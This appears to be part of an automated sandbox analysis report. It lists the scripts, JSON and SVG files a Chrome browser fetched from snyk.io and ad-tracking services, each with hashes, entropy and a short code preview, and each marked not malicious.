                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5662],{51404:function(l,i,e){var n,a;let o=null===(a=Object.keys(e(10194).r$))||void 0===a?void 0:null===(n=a.filter(l=>!(null==l?void 0:l.includes("patch-"))))||void 0===n?void 0:n.map(l=>null==l?void 0:l.replace("pose-",""));i.Z=["",...o]},86604:function(l,i,e){e.d(i,{Z:function(){return d}});var n=e(85893),a=e(45697),o=e.n(a);function r(l){let{children:i,className:e}=l;return(0,n.jsx)("figure",{className:e,"data-component":"Media Asset Container",children:i})}r.propTypes={children:o().element};var d=r},94578:function(l,i,e){e.d(i,{Z:function(){return t}});var n=e(85893),a=e(45697),o=e.n(a),r=e(44133),d=e(51404);function s(l){let{as:i="div",pose:e="alert",reversePose:a,className:o}=l;return(0,n.jsx)(i,{className:(0,r.Z)("w-full patch pose-".concat(e),"span"===i&&"d-inline-block",a&&"flip-h",o),"data-component":"Patch"})}s.propTypes={as:o().oneOf(["span","div"]),pose:o().oneOf(d.Z),reversePose:o().bool,className:o()
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (36995), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):36995
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.200154539819763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:h90Wjj74oB5Tf1JcNvDIweEzpg3pmAX7XODXWcWLfN5HS8IWpMvyfA+g/v:h90yj74A4pDNpM7XGWRfN51IOfA+2v
                                                                                                                                                                                                                                                                                                              MD5:7B7E39FCA61E2FC0B605DB6B496695F1
                                                                                                                                                                                                                                                                                                              SHA1:97C264DC630C80461F73675041D50ECD9760D0C5
                                                                                                                                                                                                                                                                                                              SHA-256:23AAEB229C57F3DA16FF1786D890F81DD548CCEC78081B918C3B7AAA70827BA2
                                                                                                                                                                                                                                                                                                              SHA-512:FD74C8B2A82CC3A9E76BB7279D3D639315EF4C638CCCE9C8D1EDFD674266D123D44037551630E498579BCA3A1F0848954146CA7D80B41DAFF6B1EDD26D17842B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[37],{"+nxv":function(e,t,n){"use strict";n.d(t,"a",function(){return initAndBind});var r=n("zgdO"),i=n("usiZ");function initAndBind(e,t){!0===t.debug&&("undefined"===typeof __SENTRY_DEBUG__||__SENTRY_DEBUG__?r.c.enable():console.warn("[Sentry] Cannot initialize SDK with `debug` option using a non-debug bundle."));var n=Object(i.a)(),s=n.getScope();s&&s.update(t.initialScope);var a=new e(t);n.bindClient(a)}},"5g57":function(e,t,n){"use strict";n.d(t,"a",function(){return v}),n.d(t,"b",function(){return addGlobalEventProcessor});var r=n("WwEg"),i=n("jm9a"),s=n("nfbA"),a=n("uIJS"),o=n("wQh9"),c=n("26VM"),u=n("xqFT"),_=n("bTzN"),d=n("zgdO"),l=n("Iwrg"),p=n("2nP+"),f=n("Te+l"),v=function(){function Scope(){Object(a.a)(this,Scope),this._notifyingListeners=!1,this._scopeListeners=[],this._eventProcessors=[],this._breadcrumbs=[],this._attachments=[],this._user={},this._tags={},this._extra={},this._contexts={},this._sdkProcessingMetadata={}}r
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65514), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):75439
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.130404288391323
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:mofwwRdJ8kfqyAqy9yeiRGw2WcrNXr9faMe:moJEyTy9yFRyJrI
                                                                                                                                                                                                                                                                                                              MD5:EEC6F83830445756DFD306CA6A0B9FD9
                                                                                                                                                                                                                                                                                                              SHA1:456EA4D5EAD4168D9D2DAABC8E6A99446E244C92
                                                                                                                                                                                                                                                                                                              SHA-256:6D875972CB7ECD49A0C1CF4F2163F096B5C0A4F4175C037F8F4C7E3EFE2F2B3E
                                                                                                                                                                                                                                                                                                              SHA-512:DA80FD97619471C52DF5E26E0C23A44F768E50970B6742460BE6D37326124D2878133DB63C6FB5C1D7C7C8DB53A5D88249AFB6823D651D51E734DD9CDF061CBC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/application-security.json?slug=solutions&slug=application-security
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6atdjnf02gN2lri6QJutpC","type":"Entry","createdAt":"2022-11-04T16:35:55.460Z","updatedAt":"2024-03-14T20:38:21.391Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":70,"revision":18,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Application security solution page","title":"Application security (AppSec) solution | Snyk","slug":"application-security","uri":"solutions/application-security","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4c4Qt7ApbCj77DFG9wysIj","type":"Entry","createdAt":"2022-11-04T16:35:55.626Z","updatedAt":"2024-07-26T13:14:07.431Z","environment":{"sys":{"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3757)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):6373
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.633527172256383
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:rpbUIaS10/0SCm9ktxUeWvUVUNGO97rPlo8E2hnEDLhak4ZYejCxrE:9bUIvkkhVUoerdo8jnEDLkksXjwrE
                                                                                                                                                                                                                                                                                                              MD5:641C8C8F4E0575ADCF79A3228A7C1B87
                                                                                                                                                                                                                                                                                                              SHA1:B6709412F4F674F7AF00E83EA2D4EE01718CB66F
                                                                                                                                                                                                                                                                                                              SHA-256:6DC31422E6F6100518688D444F8A1EA503873EE89ED0CEBD048E7206B9110130
                                                                                                                                                                                                                                                                                                              SHA-512:EEF55678199599DFA94CE6B2BC93255B359E9783E5CF1CECA7E5928CBC5F40D974598344E3FF4591D74619A056EE0DA347F78BF8A9B7598C68C7AA7B455BA795
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://go.snyk.io/rs/677-THP-415/images/teknkl-formsplus-emailpattern-1.0.3.js?version=0
                                                                                                                                                                                                                                                                                                              Preview:window.FormsPlus=window.FormsPlus||{allDescriptors:{},allMessages:{},detours:{}};FormsPlus.emailPattern={match:function(userEmail,patternList,negate){let userFull=userEmail.toLowerCase(),userParts=userFull.split("@"),userDomain=userParts.pop(),userMailbox=userParts.join("@");const MODE_DOMAIN_SUFFIX=1,MODE_DOMAIN_PREFIX=2,MODE_DOMAIN_FULL=4,MODE_MAILBOX=8,MODE_FULL_REGEX=16,MODE_FULL_EXACT=32,MODE_PLAIN=64,MODE_HASH=128;const RE_LEADING_WC=/^[.]/,RE_TRAILING_WC=/[.]$/,RE_TRAILING_SEP=/@$/,RE_EMAIL_LIKE=/^.+@.+$/,RE_TAGGED_HASH=/^\[h:([a-f0-9]+)\]$/i;let isSomeMatch=patternList.some(function(pattern){let matchingMode=MODE_DOMAIN_FULL|MODE_PLAIN;if(pattern instanceof RegExp){matchingMode&=~MODE_DOMAIN_FULL;matchingMode|=MODE_FULL_REGEX;}else if(RE_EMAIL_LIKE.test(pattern)){matchingMode&=~MODE_DOMAIN_FULL;matchingMode|=MODE_FULL_EXACT;}else if(RE_LEADING_WC.test(pattern)){matchingMode&=~MODE_DOMAIN_FULL;matchingMode|=MODE_DOMAIN_SUFFIX;pattern=pattern.replace(RE_LEADING_WC,"");}else if(RE
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (31988)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):70103
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.350957695758152
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:L+i0S1TpywbZi31SPTnODPEGnVbg94ePcwD4wP1nN69X1SiraqXztGV51Au+:qY7ZbpwDw1y
                                                                                                                                                                                                                                                                                                              MD5:7E1853E10A9F3C69AF99931DDCEE9138
                                                                                                                                                                                                                                                                                                              SHA1:3CFF5AE87ED02DE01F327DBF0DAB0FA39A469C97
                                                                                                                                                                                                                                                                                                              SHA-256:56DF5BF2317BC2156B954C3FD2913AFCCE23EB4947C47F3AC401017DC4A0151D
                                                                                                                                                                                                                                                                                                              SHA-512:474FB64341A56957391FE59E39BB1152EE6EC534B577C95CF6E4B5D00846F70621DDB2FFED62FEF06B3A9EA796E560110F657A890B70F311A083C29D6E76AD2F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:!function(){var t={},e={},n={},i={},r={},o={},a={},s={},u={},l={},c={},d={},f={},h={},p={},m={},v={},b={},y={},g={},w={},_={},E={},k={},S={},C={},T={},F={},x={},A={},I={},M={},U={},L={},P={},N=this&&this.__spreadArray||function(t,e,n){if(n||2===arguments.length)for(var i,r=0,o=e.length;r<o;r++)!i&&r in e||(i||(i=Array.prototype.slice.call(e,0,r)),i[r]=e[r]);return t.concat(i||Array.prototype.slice.call(e))},D=this&&this.__extends||function(){var t=function(e,n){return(t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(t[n]=e[n])})(e,n)};return function(e,n){function i(){this.constructor=e}if("function"!=typeof n&&null!==n)throw new TypeError("Class extends value "+String(n)+" is not a constructor or null");t(e,n),e.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}(),O=this&&this.__assign||function(){return O=Object.assign||function(t){for(var e,n=1,i=argument
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):111916
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.893380737291319
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:lqjf3IvHA5ADdfQQoJ0bscW+oheIDVeA8Bs659vVvYfnTlvNP4Sm3GqU:xdPLw9xGBT/YfnT5Nq3W
                                                                                                                                                                                                                                                                                                              MD5:E5267F1138DC9D64CA2971D3B48C379A
                                                                                                                                                                                                                                                                                                              SHA1:EF74C534DAB9E15D0647E964E95317EBF617FC8B
                                                                                                                                                                                                                                                                                                              SHA-256:542970E00E0FC3AC72193FA973BB55E84807C01058EF8FF16E16ED51572A17A7
                                                                                                                                                                                                                                                                                                              SHA-512:1F4BC72E27A914C4CB1568F187AA495161C5C543242917053AC44176B607E70E097F3B47F0FCD5E178B13AAAFCFB035A16ACD9AE3CC0E4161262D5245CE52672
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg width="1200" height="630" viewBox="0 0 1200 630" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.<g clip-path="url(#clip0_8631_30224)">.<rect width="1200" height="630" fill="url(#paint0_linear_8631_30224)"/>.<g clip-path="url(#clip1_8631_30224)">.<rect width="1230.48" height="646" transform="translate(-15.2381 -8)" fill="white"/>.<g clip-path="url(#clip2_8631_30224)">.<rect width="1230.48" height="643.949" transform="translate(-15.4762 -6.97461)" fill="white"/>.<rect x="-15.4762" y="636.975" width="643.949" height="1230.48" transform="rotate(-90 -15.4762 636.975)" fill="#030328"/>.<g style="mix-blend-mode:color-dodge" filter="url(#filter0_f_8631_30224)">.<path d="M154.356 774.965C28.4077 646.934 202.931 472.103 296.813 434.968C592.265 319.046 1073.81 469.146 1084.86 705.508C1095.9 941.869 284.438 907.199 154.356 774.965Z" fill="#E555AC"/>.</g>.<g opacity="0.5">.<g style="mix-blend-mode:overlay">.<rect x="1215" y="636.975" width="1230.48"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32012)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):203665
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.507397133059363
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:5i/bgBBN4g71je7Ph8kSUR1p8OldwwYL2u3DDU8CuqjmMtI:0kBcWjkPmdUFCeu3DDU8Cuqjmp
                                                                                                                                                                                                                                                                                                              MD5:85061C1AF76DAB9F734EF1831BB8FA63
                                                                                                                                                                                                                                                                                                              SHA1:98006E980FD5A1A7F2475D5227EA38EBC5692708
                                                                                                                                                                                                                                                                                                              SHA-256:0602C4FB1597B7E6E111FE79777E195CACBC73774FCAF233A7835B33372DCEAE
                                                                                                                                                                                                                                                                                                              SHA-512:EAA04331E0019E04AB41D13839E5476363A523C669908816237DCA34F4E2ABFE34302299DFD858559DE642BCC919DA09817BD5DD0842D47FACCAD36BA373ABBC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:/*! forms2 2024-08-28 See forms2.js for license info */.!function a(b,c,d){function e(g,h){if(!c[g]){if(!b[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0);if(f)return f(g,!0);var j=new Error("Cannot find module '"+g+"'");throw j.code="MODULE_NOT_FOUND",j}var k=c[g]={exports:{}};b[g][0].call(k.exports,function(a){var c=b[g][1][a];return e(c?c:a)},k,k.exports,a,b,c,d)}return c[g].exports}for(var f="function"==typeof require&&require,g=0;g<d.length;g++)e(d[g]);return e}({1:[function(a,b,c){var d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";!function(a){"use strict";function b(a){var b=a.charCodeAt(0);return b===g||b===l?62:b===h||b===m?63:i>b?-1:i+10>b?b-i+26+26:k+26>b?b-k:j+26>b?b-j+26:void 0}function c(a){function c(a){j[l++]=a}var d,e,g,h,i,j;if(a.length%4>0)throw new Error("Invalid string. Length must be a multiple of 4");var k=a.length;i="="===a.charAt(k-2)?2:"="===a.charAt(k-1)?1:0,j=new f(3*a.length/4-i),g=i>0?a.length-4:a.length;var l=0
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.950212064914747
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Sn:S
                                                                                                                                                                                                                                                                                                              MD5:D97623D172F087D9640DA9ACD38830FF
                                                                                                                                                                                                                                                                                                              SHA1:515BD358BB7D990930F0E2B3DE399DB1787A2567
                                                                                                                                                                                                                                                                                                              SHA-256:FE04A9DC88D3F3BE8D4F6BC63A9A80F45A4C6D8460E7551DAB849457C091920A
                                                                                                                                                                                                                                                                                                              SHA-512:CE6A1969F698A616663F1A19CCFA12A37A4F6D782432D8A08AEB7879EFD3E2BECF168422EA66BC47E74F6BA865EFAAE6EABE3C4FABA280D7A21F3A94D7C55DA1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://c.6sc.co/
                                                                                                                                                                                                                                                                                                              Preview:<p></p>
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):206232
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.433565204722256
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:dIwaPlC0pCax+sEhXla74a7naqBtYezU6IKeyo8rC8UglCJ9P1xb:dI1IlaEajaq/lo8rC
                                                                                                                                                                                                                                                                                                              MD5:7F16B636D5C74B50AE2EADA438D25A23
                                                                                                                                                                                                                                                                                                              SHA1:9273A01CC18A1AFBD5763A10B668669A1B62C653
                                                                                                                                                                                                                                                                                                              SHA-256:0E16B9F7CE650C3ED0045C50306B1569E9A69FC76215161634E1B446DE8E8523
                                                                                                                                                                                                                                                                                                              SHA-512:F02BD34D0C8F0014333C97C59B686CEB63A56212D1E44BE1A4C7ACA5C0D004A623AACF9259BC04023CA7FD956053EB77BB49A66652783BE694E8580A89E1C304
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{51075:function(e,t,a){"use strict";var r=a(74331),n=Object.prototype.toString,o=function(e){var t=typeof e;return"number"===t||"object"===t&&"[object Number]"===n.call(e)},s="function"==typeof Array.isArray?Array.isArray:function(e){return"[object Array]"===n.call(e)},i=function(e,t){for(var a=0;a<t.length&&!1!==e(t[a],a,t);a+=1);},l=function(e,t){for(var a=r(t),n=0;n<a.length&&!1!==e(t[a[n]],a[n],t);n+=1);};e.exports=function(e,t){return(null!=t&&(s(t)||"function"!==t&&o(t.length))?i:l).call(this,e,t)}},74331:function(e){"use strict";var t=Object.prototype.hasOwnProperty,a=String.prototype.charAt,r=Object.prototype.toString,n=function(e,t){return a.call(e,t)},o=function(e,a){return t.call(e,a)},s=function(e,t){t=t||o;for(var a=[],r=0,n=e.length;r<n;r+=1)t(e,r)&&a.push(String(r));return a},i=function(e,t){t=t||o;var a=[];for(var r in e)t(e,r)&&a.push(String(r));return a};e.exports=function(e){return null==e?[]:"[object Str
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1251
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.43076853772861
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:md7pIgWcbMdRKLmOeQSfmFtHXRWYxRWZgRK+uKF69FxPg6F/ysbVFyIF/IFKe+C+:a7phWzRK4ZcVwYxwTlLxg6FKWrSuCMrT
                                                                                                                                                                                                                                                                                                              MD5:CB731CC5C2BD9F31D6BFEB19F3C8B1FF
                                                                                                                                                                                                                                                                                                              SHA1:16ACA1C951A03EDD875B99BB8D04F01FA19104AF
                                                                                                                                                                                                                                                                                                              SHA-256:5206536707C84BAA892D3C3231B351985EE828CB8B9C0BD8DB42CD3363995FC4
                                                                                                                                                                                                                                                                                                              SHA-512:61A3C5029F6AA6D1EA60711B5BFBE4DF989F8EFB1999919B017C5391A537F5D9245E72184298A8DDA85CFCB92ECACAEA34ADC6C485B04C72AB9CF0AB33B0D976
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:/*. * Copyright (c) 2007-2023, Marketo, Inc. All rights reserved.. * See https://developers.marketo.com/MunchkinLicense.pdf for license terms. * Marketo marketing automation web activity tracking script. * Version: prod r908. */. (function(b){if(!b.Munchkin){var c=b.document,e=[],k,l={fallback:"163"},g=[],m=function(){if(!k){for(;0<e.length;){var f=e.shift();b.MunchkinTracker[f[0]].apply(b.MunchkinTracker,f[1])}k=!0}},n=function(f){var a=c.createElement("script"),b=c.getElementsByTagName("base")[0]||c.getElementsByTagName("script")[0];a.type="text/javascript";a.async=!0;a.src=f;a.onreadystatechange=function(){"complete"!==this.readyState&&"loaded"!==this.readyState||m()};a.onload=m;b.parentNode.insertBefore(a,b)},h={CLICK_LINK:"CLICK_LINK",.VISIT_WEB_PAGE:"visitWebPage",init:function(b){var a;a=l[b];if(!a&&0<g.length){a=b;var c=0,d;if(0!==a.length)for(d=0;d<a.length;d+=1)c+=a.charCodeAt(d);a=g[c%g.length]}a||(a=l.fallback);e.push(["init",arguments]);"150"===a?n("//munchkin-cdn.marketo.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2345)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):194038
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.527665058487504
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:BJRhbIGc3kWhyZF0QSncEjCPfrgiAmas3rOXk9nlrA:fRo3k4yKJvius3qXk9nlU
                                                                                                                                                                                                                                                                                                              MD5:E1BD68DC3754D0CF06F5486E774E57E8
                                                                                                                                                                                                                                                                                                              SHA1:E662AF4636CF30D8D9EB361735AFC46736E71F34
                                                                                                                                                                                                                                                                                                              SHA-256:579C199B684505408843E10E2B9D4AC39AFCCA7A9BD5497E07B8779E8B0B23BC
                                                                                                                                                                                                                                                                                                              SHA-512:CEF68ED2D54B24D03A07A81A7DB846A4B358FF88E0F3A977F3D0914ABC365A5E3E7EC769C308B3D62D4D6AC3E6A8AEEAD3CEA0D9A2DE639DE8EBB89C59D3BF2C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://www.google-analytics.com/gtm/js?id=GTM-K59728M&cid=1178466141.1729799377
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"163",. . "macros":[{"function":"__e"},{"function":"__dee"}],. "tags":[{"function":"__asprv","vtp_globalName":"google_optimize","vtp_listenForMutations":false,"tag_id":10},{"function":"__asprv","tag_id":11}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":["macro",1]},{"function":"_eq","arg0":["macro",0],"arg1":"optimize.callback"}],. "rules":[[["if",0],["add",0]],[["if",1],["add",1]]].},."runtime":[ [50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__e":{"2":true,"4":true}...}.,"blob":{"1":"163"}.,"permissions":{."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__e"..]...}....};.....var aa,ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ca=typeof Object.defineProperties=="functio
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3501), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):3501
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.270298652138563
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:ibrmQEFBQKhTIS/sQ2byoAdOefjpdXxQdOefj9OZ4SaefjpKmyJMT2iXyemMWPn9:AdgM2/XVaKyriXUBv9
                                                                                                                                                                                                                                                                                                              MD5:063426302167D73BD81249302550A93B
                                                                                                                                                                                                                                                                                                              SHA1:1DF989309BE27A18514C92EC3309DDAF03B9BAF6
                                                                                                                                                                                                                                                                                                              SHA-256:5DB1F85737066099C0183984352DAB83CF3B3AD197304224A3804032139D9B9C
                                                                                                                                                                                                                                                                                                              SHA-512:1E529279D59F9A662D3A5FCDE292DD8E90AAF3A2A1C88F65FB5F2AAE224A7EE042475612381566387F0F0DC029EE3B2DCD149F1DC2A4E66F901807677EFCED2C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/2614.3ec078ba5dda1b72.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2614],{5698:function(l,e,i){i.d(e,{Z:function(){return u}});var n=i(85893),r=i(67294),a=i(45697),s=i.n(a),o=i(40070),d=i(44133);function t(l){let e;let{logos:i,headline:a,isCluster:s,isScroll:t,taperFadeColor:u}=l,v=(0,r.useRef)(null),c=(0,r.useRef)(null);return(0,r.useEffect)(()=>{if(t){let l=c.current,e=v.current,i=0,n=new ResizeObserver(()=>{i=0,e.style.transform="translateX(-".concat(i,"px)")});n.observe(l);let r=()=>{(i+=.5)>1082&&(i=0),e.style.transform="translateX(-".concat(i,"px)"),requestAnimationFrame(r)},a=requestAnimationFrame(r);return()=>{cancelAnimationFrame(a),n.unobserve(l)}}},[t]),(0,n.jsxs)("div",{className:(0,d.Z)(s&&"bg-white radius-extra-large",!t&&"pad-h-huge mobile:pad-small"),"data-component":"Logo Parade",children:[a&&(0,n.jsx)("p",{className:"txt-subhead txt-color-headline txt-center marg-b-extra-large",children:a}),t?(0,n.jsx)("div",{ref:c,className:(0,d.Z)("w-full h-extra-large taper-fade
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):5550
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.08413407543783
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:T/FaJP0dFUt4Fe+e0HFmP29tX9YdGOkjnNCVDFL+3nrIE5K0xUaSS:DFrut4EaYO9tW2OunrZM0uC
                                                                                                                                                                                                                                                                                                              MD5:8242F9F169F5CCBADF3768078BD83E35
                                                                                                                                                                                                                                                                                                              SHA1:47172C3F38E9618C7BF7D5AC180E8FF97816B46B
                                                                                                                                                                                                                                                                                                              SHA-256:F9AAB069A4C2E5B6F9FBB3BE741E4476BFC5052474468C6A38A6AF2469399603
                                                                                                                                                                                                                                                                                                              SHA-512:4AD20651AB371F1AF36AFF3FEE1FC7CF50FCFBDF5704DD7492EBF4A1337FAE4BDF8AA162143B7ADD768968FAE446A40C4A232FD48FAA9FB991CAC98C2C4B37F3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg width="84" height="48" viewBox="0 0 84 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_13037_2533)">.<path d="M22.9551 20.1788V18.0073H19.0107V31.3228H23.0518V23.9436C23.7443 22.4018 24.9126 21.6307 26.5569 21.6303C27.0366 21.628 27.5152 21.6755 27.9851 21.7721V17.9483C27.6384 17.8225 27.2173 17.7595 26.7218 17.7595C25.3514 17.7595 24.0958 18.566 22.9551 20.1788Z" fill="#134B97"/>.<path d="M40.9101 29.5653C42.2125 28.2403 42.8637 26.6018 42.8637 24.6498C42.8637 22.7141 42.2125 21.0813 40.9101 19.7515C39.6077 18.4217 37.9906 17.7568 36.0588 17.7568C34.1271 17.7568 32.5122 18.4248 31.2142 19.7608C29.9163 21.0968 29.267 22.7264 29.2666 24.6498C29.2666 26.5731 29.9158 28.2046 31.2142 29.5441C32.5127 30.8836 34.1275 31.5535 36.0588 31.554C37.9906 31.5557 39.6077 30.8928 40.9101 29.5653ZM33.9231 26.9498C33.3684 26.3254 33.091 25.5596 33.091 24.6524C33.091 23.7607 33.3684 23.0009 33.9231 22.3729C34.4778 21.7449 35.1899 21.4306 36.0595 21.4302C36.9287 21.4302
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):32069
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.512250357902126
